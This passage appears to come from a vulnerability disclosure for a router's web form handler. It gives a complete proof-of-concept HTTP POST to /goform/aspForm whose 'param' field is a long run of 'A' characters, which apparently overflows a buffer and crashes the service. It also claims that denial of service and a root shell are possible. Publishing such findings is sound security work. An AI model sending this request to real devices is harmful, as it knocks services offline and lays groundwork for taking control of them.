2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

Tag

#windows